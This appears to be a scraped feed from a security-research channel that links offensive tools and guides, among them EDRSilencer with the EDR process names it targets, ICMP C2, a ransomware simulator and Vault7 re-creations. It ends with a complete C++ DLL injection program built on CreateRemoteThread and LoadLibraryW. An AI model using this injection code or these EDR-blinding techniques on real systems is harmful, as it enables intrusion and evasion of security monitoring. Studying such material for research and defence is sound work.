[ EDRSilencer ]

A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server.

EDR list:

Microsoft Defender for Endpoint and Microsoft Defender Antivirus
"MsMpEng.exe",
"MsSense.exe",
Elastic EDR
"elastic-agent.exe",
"elastic-endpoint.exe",
"filebeat.exe",
Trellix EDR
"xagt.exe"

https://github.com/netero1010/EDRSilencer

#EDR

@islemolecule_source

native api documentation
https://ntdoc.m417z.com/processinfoclass

#win_api
@islemolecule_source

📘LOLBIN ATTACK & DEFENSE🛠

@islemolecule_source
#lolbin
#malware_dev

"Shellcode Development", 2023

#shellcode
#malware_dev
@islemolecule_source

analyzing-decompiled-C++

#reverse

@islemolecule_source

PingRAT: secretly passes C2 traffic through firewalls using ICMP payloads

https://github.com/umutcamliyurt/PingRAT

#c2 ,#tool , #go
———
@islemolecule_source

PSRansom: a PowerShell Ransomware Simulator with C2 Server capabilities.

https://github.com/JoelGMSec/PSRansom

#c2 , #powershell , #simulat , #tool
———
@islemolecule_source

TLDR; 4 new releases from @myhackerhouse
for your malware development and analysis purposes with 3 re-created from the CIA's Vault7 leak.

1. https://github.com/hackerhouse-opensource/marble

2. https://github.com/hackerhouse-opensource/WMIProcessWatcher

3. https://github.com/hackerhouse-opensource/Artillery

4. https://github.com/hackerhouse-opensource/SignToolEx


#malware_dev ,#analysis ,
———
@islemolecule_source

How to break bare metal firmware encryption (FortiGate firewalls) for security research.
Credits: Jon Williams (@bishopfox)

https://bishopfox.com/blog/breaking-fortinet-firmware-encryption

#firewall, #fortigate ,
———
@islemolecule_source

Browser Extension Pentesting Methodology
credit : @hacktricks_live

https://book.hacktricks.xyz/pentesting-web/browser-extension-pentesting-methodology

#methodology
———
@islemolecule_source

Pentesting LLM apps 101
credit : @JubbaOnJeans

https://boringappsec.substack.com/p/guest-post-edition-24-pentesting

#LLM ,
———
@islemolecule_source

Detecting and decrypting Sliver C2 – a threat hunter’s guide

https://immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/

#c2 ,
———
@islemolecule_source

7k view & 150 likes on twitter, i really don't know what to say 🤷‍♀
Share posts plz

great burpsuite series by Meraj Heydari
credit : @meraj_heydari
language : persian

https://www.youtube.com/playlist?list=PL7ZQRFOOo39A0kV-GK-kFaX2jGA3PMz0-

#burpsuite ,
———
@islemolecule_source

exploiting a use-after-free in Linux kernel 5.15 (Ubuntu 22.04) (CVE-2022-32250)

credit: @saidelike

research.nccgroup.com/2022/0…

#linux , #kernel , #analysis , #exploitation
__
@islemolecule_source

DLL Injection classic way
:)

1- address of the dll
2- allocate a buffer in target process
3- write dll address to that
4- create a thread to execute

int main(int argc, char *argv[]) {
 HANDLE processHandle;
 PVOID remoteBuffer;
 wchar_t dllPath[] = TEXT("C:\\experiments\\evilm64.dll");
 
 printf("Injecting DLL to PID: %i\n", atoi(argv[1]));
 processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
 remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof dllPath, MEM_COMMIT, PAGE_READWRITE); 
 WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)dllPath, sizeof dllPath, NULL);
 PTHREAD_START_ROUTINE threatStartRoutineAddress = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
 CreateRemoteThread(processHandle, NULL, 0, threatStartRoutineAddress, remoteBuffer, 0, NULL);
 CloseHandle(processHandle); 
 
 return 0;
}

iredteam
#malware_dev

@islemolecule_source